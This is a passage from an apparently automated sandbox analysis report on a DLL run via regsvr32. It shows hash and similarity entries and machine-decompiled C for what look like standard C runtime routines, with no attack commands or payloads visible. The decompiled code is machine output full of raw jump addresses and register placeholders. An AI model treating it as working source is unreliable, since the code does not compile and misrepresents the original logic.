                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                                      • API String ID: 2123368286-3532421942
                                                      • Opcode ID: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                      • Instruction ID: a908f33eec800d0b641dcce84a446a4f1bc570cb1104d1739574f535c1af449d
                                                      • Opcode Fuzzy Hash: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                      • Instruction Fuzzy Hash: 2D115771A2D6468AE7949B54E948B6E73E0F380344F605125F6DD43AA8C7BED508CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                      • API String ID: 2123368286-152112980
                                                      • Opcode ID: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                      • Instruction ID: 92758ea50bb160a3fa02acdedbd4276cd578df270f1ec03c6948689f63d256e2
                                                      • Opcode Fuzzy Hash: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                      • Instruction Fuzzy Hash: B7110331A1CA83C9F7A09B54EC047AEB6E0F340345F604425D6C8466A4CBBEE8888B02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                                      • API String ID: 433497747-929597301
                                                      • Opcode ID: 659d91e782a8862001f0c3efa2abcda19efd609cd314a8a22f2ba95e8e412daa
                                                      • Instruction ID: a509fa70e7a1a5ff7154c4a485401b757d9bccf253ee3a6eb315a1ba73516cba
                                                      • Opcode Fuzzy Hash: 659d91e782a8862001f0c3efa2abcda19efd609cd314a8a22f2ba95e8e412daa
                                                      • Instruction Fuzzy Hash: 25012D21A2C64282F3D09B65EC4473EA2E0F784B50F719275A9DE426F5CF3FE4018A01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                      • API String ID: 2123368286-3131718208
                                                      • Opcode ID: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                      • Instruction ID: 5c692777b4ebe1842fa8b4633668c7a74dcbf255a9000a4830a35d89f8dfec26
                                                      • Opcode Fuzzy Hash: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                      • Instruction Fuzzy Hash: 64113571E086469AF7A08B28ED047BE62E0F344708F608225A7EC076F5D77EE548CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                      • API String ID: 2123368286-1927795013
                                                      • Opcode ID: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                      • Instruction ID: 0384ac4a385dd8b2ed67f657b87bd2987707cc06f4fd1891b24df9f5e25f1ad6
                                                      • Opcode Fuzzy Hash: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                      • Instruction Fuzzy Hash: D7010832E0C646D6F7A08B68EC057AD66D0B380354F704225A69C066F9DB7EE585CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                                      • API String ID: 2123368286-563024394
                                                      • Opcode ID: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                      • Instruction ID: fd38c362069ef75f6546e890191a2209ff1da2573c153e25103ddfba7490d183
                                                      • Opcode Fuzzy Hash: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                      • Instruction Fuzzy Hash: EA011A3190964A86EBA09F14EC417AE32E0F355328FA14226D29C466E4DB7FE545CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                                      • API String ID: 2123368286-577066449
                                                      • Opcode ID: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                      • Instruction ID: 02d1b78a9e545c30370c255a3c9a69dd209a03738a12318584891449022be9b6
                                                      • Opcode Fuzzy Hash: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                      • Instruction Fuzzy Hash: 8F017831E0C64ACAF7E08B54EC847AD26E0F794394FB09535A6DD466F8CB7EE5448B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 1646373207-1276376045
                                                      • Opcode ID: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                      • Instruction ID: 7d77de13c6c7ff31230b68e177806ee2c45e09dad43843c6dfa61805c8a48305
                                                      • Opcode Fuzzy Hash: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                      • Instruction Fuzzy Hash: 97F0AC32918A4282D674DB18F94836DB7F0F388348F644125D6CE42678DF3ED559CA04
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 41%
                                                      			E000007FE7FEF9D40C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
                                                      				signed long long _v16;
                                                      				long _v24;
                                                      				void* _t57;
                                                      				signed long long _t59;
                                                      
                                                      				_t57 = __rax;
                                                      				_a8 = __ecx;
                                                      				E000007FE7FEF9D3F900(_a8);
                                                      				if (_t57 == 0xffffffff) goto 0xf9d40d05;
                                                      				if (_a8 != 1) goto 0xf9d40cb3;
                                                      				if (( *( *0xf9d4e560 + 0xb8) & 0x00000001) != 0) goto 0xf9d40ccc;
                                                      				if (_a8 != 2) goto 0xf9d40cef;
                                                      				_t59 =  *0xf9d4e560;
                                                      				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0xf9d40cef;
                                                      				E000007FE7FEF9D3F900(1);
                                                      				_v16 = _t59;
                                                      				E000007FE7FEF9D3F900(2);
                                                      				if (_v16 == _t59) goto 0xf9d40d05;
                                                      				E000007FE7FEF9D3F900(_a8);
                                                      				if (CloseHandle(??) == 0) goto 0xf9d40d0f;
                                                      				_v24 = 0;
                                                      				goto 0xf9d40d19;
                                                      				_v24 = GetLastError();
                                                      				E000007FE7FEF9D3F7D0(_a8, _t59);
                                                      				 *((char*)( *((intOrPtr*)(0xf9d4e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
                                                      				if (_v24 == 0) goto 0xf9d40d60;
                                                      				E000007FE7FEF9D2AA70(_v24,  *((intOrPtr*)(0xf9d4e560 + _t59 * 8)));
                                                      				goto 0xf9d40d62;
                                                      				return 0;
                                                      			}








                                                      Similarity
                                                      • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                                      • String ID:
                                                      • API String ID: 1551955814-0
                                                      • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                      • Instruction ID: de0ed08be9decc95e7dd14c86c95eccfc4319969b2c7c8741dbc19f533f0ba9a
                                                      • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                      • Instruction Fuzzy Hash: 4A219F32A0C64686E7A49B28EC4133E72E1F781355F348235E6DD46AF9DB2EE845CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: FormatLocaleThread$DateTime
                                                      • String ID:
                                                      • API String ID: 3587784874-0
                                                      • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                      • Instruction ID: 0d03bf333fdb9b17262424d59d82d7c7719cce37cb4ba974854027563787c74d
                                                      • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                      • Instruction Fuzzy Hash: 3311E33160878086E3608F68F94025EB7E0F748BA4F648724EF9D47BA8CB3ED1418700
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 23%
                                                      			E000007FE7FEF9D2A5E0(long long __rcx, void* _a8) {
                                                      				signed int _v24;
                                                      				char _v42;
                                                      				void* _v48;
                                                      				signed int _v56;
                                                      				char _v312;
                                                      				signed char* _v328;
                                                      				char _v584;
                                                      				char _v840;
                                                      				char _v1352;
                                                      				char _v1384;
                                                      				char _v1392;
                                                      				intOrPtr _v1400;
                                                      				long long _v1408;
                                                      				long long _v1416;
                                                      				signed long long _t206;
                                                      				signed char* _t214;
                                                      				signed long long _t223;
                                                      				intOrPtr _t225;
                                                      				intOrPtr _t226;
                                                      				signed long long _t233;
                                                      
                                                      				_t224 = __rcx;
                                                      				_a8 = __rcx;
                                                      				_t206 =  *0xf9d4b018; // 0x6ec2365e8408
                                                      				_v24 = _t206 ^ _t233;
                                                      				if (GetCPInfo(??, ??) == 0) goto 0xf9d2a906;
                                                      				_v56 = 0;
                                                      				goto 0xf9d2a63c;
                                                      				_v56 = _v56 + 1;
                                                      				if (_v56 - 0x100 >= 0) goto 0xf9d2a661;
                                                      				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
                                                      				goto 0xf9d2a62c;
                                                      				_v312 = 0x20;
                                                      				_v328 =  &_v42;
                                                      				goto 0xf9d2a68f;
                                                      				_v328 =  &(_v328[2]);
                                                      				if (( *_v328 & 0x000000ff) == 0) goto 0xf9d2a6ea;
                                                      				_v56 =  *_v328 & 0x000000ff;
                                                      				goto 0xf9d2a6c2;
                                                      				_v56 = _v56 + 1;
                                                      				_t214 = _v328;
                                                      				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0xf9d2a6e8;
                                                      				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
                                                      				goto 0xf9d2a6b2;
                                                      				goto 0xf9d2a67b;
                                                      				_v1392 = 0;
                                                      				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
                                                      				_v1408 =  *((intOrPtr*)(_a8 + 4));
                                                      				_v1416 =  &_v1352;
                                                      				r9d = 0x100;
                                                      				E000007FE7FEF9D2F4D0(1,  &_v1352, __rcx,  &_v312);
                                                      				_v1384 = 0;
                                                      				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                      				_v1400 = 0x100;
                                                      				_v1408 =  &_v840;
                                                      				_v1416 = 0x100;
                                                      				r8d = 0x100;
                                                      				E000007FE7FEF9D2EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
                                                      				_v1384 = 0;
                                                      				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                      				_v1400 = 0x100;
                                                      				_v1408 =  &_v584;
                                                      				_v1416 = 0x100;
                                                      				r8d = 0x200;
                                                      				_t223 = _a8;
                                                      				E000007FE7FEF9D2EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
                                                      				_v56 = 0;
                                                      				_v56 = _v56 + 1;
                                                      				if (_v56 - 0x100 >= 0) goto 0xf9d2a901;
                                                      				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0xf9d2a879;
                                                      				_t225 = _a8;
                                                      				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
                                                      				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
                                                      				goto 0xf9d2a8fc;
                                                      				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0xf9d2a8e5;
                                                      				_t226 = _a8;
                                                      				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
                                                      				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
                                                      				goto 0xf9d2a8fc;
                                                      				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
                                                      				goto L1;
                                                      				goto 0xf9d2aa20;
                                                      				_v56 = 0;
                                                      				_v56 = _v56 + 1;
                                                      				_v56 = _v56 + 1;
                                                      				if (_v56 - 0x100 >= 0) goto 0xf9d2aa20;
                                                      				if (_v56 - 0x41 < 0) goto 0xf9d2a99c;
                                                      				if (_v56 - 0x5a > 0) goto 0xf9d2a99c;
                                                      				_v56 = _v56 + 1;
                                                      				__rcx = _a8;
                                                      				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
                                                      				_v56 = _v56 + 1;
                                                      				__rdx = _a8;
                                                      				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                      				_v56 = _v56 + 0x20;
                                                      				__ecx = _v56;
                                                      				__rdx = _a8;
                                                      				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
                                                      				goto 0xf9d2aa1b;
                                                      				if (_v56 - 0x61 < 0) goto 0xf9d2aa04;
                                                      				if (_v56 - 0x7a > 0) goto 0xf9d2aa04;
                                                      				_v56 = _v56 + 1;
                                                      				__rcx = _a8;
                                                      				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
                                                      				_v56 = _v56 + 1;
                                                      				__rdx = _a8;
                                                      				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                      				_v56 = _v56 - 0x20;
                                                      				__ecx = _v56;
                                                      				__rdx = _a8;
                                                      				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
                                                      				goto 0xf9d2aa1b;
                                                      				__eax = _v56;
                                                      				__rcx = _a8;
                                                      				 *((char*)(_a8 + __rax + 0x11d)) = 0;
                                                      				goto L2;
                                                      				__rcx = _v24;
                                                      				__rcx = _v24 ^ __rsp;
                                                      				return E000007FE7FEF9D23280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
                                                      			}
























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID: $z
                                                      • API String ID: 1807457897-2251613814
                                                      • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                      • Instruction ID: 4853ceba84ddbb230417778543f3b3b02ea2aa858227094ccd1c634e11d49f23
                                                      • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                      • Instruction Fuzzy Hash: C8B1B77261CAC0CAD7B58B29E8807AFB7E0F388785F155125DAC983B99DB2DD4429F00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 35%
                                                      			E000007FE7FEF9D34960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
                                                      				long long _v24;
                                                      				long long _v32;
                                                      				long long _v40;
                                                      				long long _v48;
                                                      				long long _v56;
                                                      				char _v60;
                                                      				char _v64;
                                                      				signed int _v72;
                                                      				char _v80;
                                                      				char _v88;
                                                      				long long _v96;
                                                      				intOrPtr _v104;
                                                      				long long _v112;
                                                      				long long _v120;
                                                      				long long _v128;
                                                      				signed int _v136;
                                                      				void* _t106;
                                                      				void* _t117;
                                                      				void* _t118;
                                                      				void* _t119;
                                                      				void* _t120;
                                                      				void* _t121;
                                                      				long long _t153;
                                                      				signed int _t161;
                                                      				signed int _t165;
                                                      				long long _t166;
                                                      				long long _t169;
                                                      				long long _t170;
                                                      				intOrPtr _t174;
                                                      
                                                      				_a32 = __r9;
                                                      				_a24 = __r8;
                                                      				_a16 = __rdx;
                                                      				_a8 = __rcx;
                                                      				_t153 = _a8;
                                                      				if ( *_t153 != 0x80000003) goto 0xf9d34990;
                                                      				goto 0xf9d34cc6;
                                                      				0xf9d24000();
                                                      				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0xf9d34a33;
                                                      				0xf9d24000();
                                                      				_v56 = _t153;
                                                      				E000007FE7FEF9D23D00(_t106);
                                                      				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0xf9d34a33;
                                                      				if ( *_a8 == 0xe0434f4d) goto 0xf9d34a33;
                                                      				if ( *_a8 == 0xe0434352) goto 0xf9d34a33;
                                                      				_v120 = _a64;
                                                      				_v128 = _a56;
                                                      				_v136 = _a40;
                                                      				if (E000007FE7FEF9D2E9B0(_a8, _a16, _a24, _a32) == 0) goto 0xf9d34a33;
                                                      				goto 0xf9d34cc6;
                                                      				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0xf9d34a43;
                                                      				goto 0xf9d34a48;
                                                      				E000007FE7FEF9D2CF80(_a40);
                                                      				_v120 = _a32;
                                                      				_v128 =  &_v60;
                                                      				_t161 =  &_v64;
                                                      				_v136 = _t161;
                                                      				r9d = _a48;
                                                      				r8d = _a56;
                                                      				E000007FE7FEF9D2EA30(_a16, _a40);
                                                      				_v72 = _t161;
                                                      				_v64 = _v64 + 1;
                                                      				_v72 = _v72 + 0x14;
                                                      				if (_v64 - _v60 >= 0) goto 0xf9d34cc6;
                                                      				if (_a48 -  *_v72 < 0) goto 0xf9d34c2b;
                                                      				_t165 = _v72;
                                                      				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0xf9d34c2b;
                                                      				_t117 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t165 + 4)), _t165);
                                                      				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
                                                      				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34b53;
                                                      				_t118 = E000007FE7FEF9D2E680(_t117, _t166);
                                                      				_v48 = _t166;
                                                      				_t119 = E000007FE7FEF9D2E680(_t118, _t166);
                                                      				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                      				_v40 = _t169;
                                                      				goto 0xf9d34b5f;
                                                      				_v40 = 0;
                                                      				if (_v40 == 0) goto 0xf9d34bff;
                                                      				_t120 = E000007FE7FEF9D2E680(_t119, _t169);
                                                      				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
                                                      				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34be3;
                                                      				_t121 = E000007FE7FEF9D2E680(_t120, _t170);
                                                      				_v32 = _t170;
                                                      				E000007FE7FEF9D2E680(_t121, _t170);
                                                      				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                      				goto 0xf9d34bef;
                                                      				_v24 = 0;
                                                      				_t174 = _v24;
                                                      				if ( *((char*)(_t174 + 0x10)) != 0) goto 0xf9d34c2b;
                                                      				E000007FE7FEF9D2E680( *((char*)(_t174 + 0x10)), _t174);
                                                      				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0xf9d34c30;
                                                      				goto L1;
                                                      				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                      				_v72 =  *((intOrPtr*)(_v72 + 0x10));
                                                      				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
                                                      				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
                                                      				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                      				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                      				__eflags = __rax;
                                                      				_v80 = 0;
                                                      				_v88 = 1;
                                                      				__rcx = _a64;
                                                      				_v96 = _a64;
                                                      				_v104 = _a56;
                                                      				__rcx = _v72;
                                                      				_v112 = _v72;
                                                      				_v120 = 0;
                                                      				_v128 = __rax;
                                                      				__rax = _a40;
                                                      				_v136 = _a40;
                                                      				__r9 = _a32;
                                                      				__r8 = _a24;
                                                      				__rdx = _a16;
                                                      				__rcx = _a8;
                                                      				__eax = E000007FE7FEF9D35180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
                                                      				goto L1;
                                                      				return __eax;
                                                      			}

































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MOC$RCC
                                                      • API String ID: 0-2084237596
                                                      • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                      • Instruction ID: 969568d65f9d334bdbb71439fdfa9ac9293f65c07e2bfce327525da45f7ede8f
                                                      • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                      • Instruction Fuzzy Hash: FA91193260DB8582DAA4DB55E49077EB3A0F7C4785F214526EACE83BA9CF3DE041CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                                      • API String ID: 4112623284-4095683531
                                                      • Opcode ID: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                      • Instruction ID: 45fc69fecf93984735d9c4b87304ebe4c96837b84e7424b4db74fc1719c3d08d
                                                      • Opcode Fuzzy Hash: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                      • Instruction Fuzzy Hash: 83911D36619B8586E7A08B19E98036E77E0F388798F654236EACD477B8CB3DD541CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 19%
                                                      			E000007FE7FEF9D3C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                      				signed int _t217;
                                                      				signed char _t222;
                                                      				intOrPtr _t257;
                                                      				signed int _t332;
                                                      				signed int _t333;
                                                      				signed long long _t336;
                                                      				intOrPtr* _t359;
                                                      				signed long long _t384;
                                                      
                                                      				_t332 = __rax;
                                                      				_a116 = 0x10;
                                                      				asm("bts eax, 0xf");
                                                      				_a708 = 7;
                                                      				_a708 = 0x27;
                                                      				_a72 = 0x10;
                                                      				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                      				_a84 = 0x30;
                                                      				_a85 = _a708 + 0x51;
                                                      				_a92 = 2;
                                                      				_a72 = 8;
                                                      				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                      				asm("bts eax, 0x9");
                                                      				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                      				E000007FE7FEF9D31EA0( &_a1112);
                                                      				_a824 = _t332;
                                                      				goto 0xf9d3c84b;
                                                      				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                      				E000007FE7FEF9D31EA0( &_a1112);
                                                      				_a824 = _t332;
                                                      				goto 0xf9d3c84b;
                                                      				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                      				_t333 = E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t333;
                                                      				goto 0xf9d3c80e;
                                                      				E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t333;
                                                      				goto 0xf9d3c84b;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                      				E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t333;
                                                      				goto 0xf9d3c84b;
                                                      				E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t333;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                      				if (_a824 >= 0) goto 0xf9d3c882;
                                                      				_a832 =  ~_a824;
                                                      				asm("bts eax, 0x8");
                                                      				goto 0xf9d3c892;
                                                      				_t336 = _a824;
                                                      				_a832 = _t336;
                                                      				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                      				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                      				_a832 = _a832 & _t336;
                                                      				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                      				_a116 = 1;
                                                      				goto 0xf9d3c8f5;
                                                      				_a80 = _a80 & 0xfffffff7;
                                                      				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                      				_a116 = 0x200;
                                                      				if (_a832 != 0) goto 0xf9d3c908;
                                                      				_a92 = 0;
                                                      				_a64 =  &_a687;
                                                      				_t217 = _a116;
                                                      				_a116 = _a116 - 1;
                                                      				if (_t217 > 0) goto 0xf9d3c936;
                                                      				if (_a832 == 0) goto 0xf9d3c9d3;
                                                      				_a1040 = _a72;
                                                      				_a816 = _t217 / _a1040 + 0x30;
                                                      				_a1048 = _a72;
                                                      				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                      				_t222 = _a816 + _a708;
                                                      				_a816 = _t222;
                                                      				 *_a64 = _a816 & 0x000000ff;
                                                      				_a64 = _a64 - 1;
                                                      				goto 0xf9d3c915;
                                                      				_a104 = _t222;
                                                      				_a64 = _a64 + 1;
                                                      				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                      				if (_a104 == 0) goto 0xf9d3ca12;
                                                      				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                      				_a64 = _a64 - 1;
                                                      				 *_a64 = 0x30;
                                                      				_a104 = _a104 + 1;
                                                      				if (_a108 != 0) goto 0xf9d3cc6e;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                      				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                      				_a84 = 0x2d;
                                                      				_a92 = 1;
                                                      				goto 0xf9d3ca95;
                                                      				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                      				_a84 = 0x2b;
                                                      				_a92 = 1;
                                                      				goto 0xf9d3ca95;
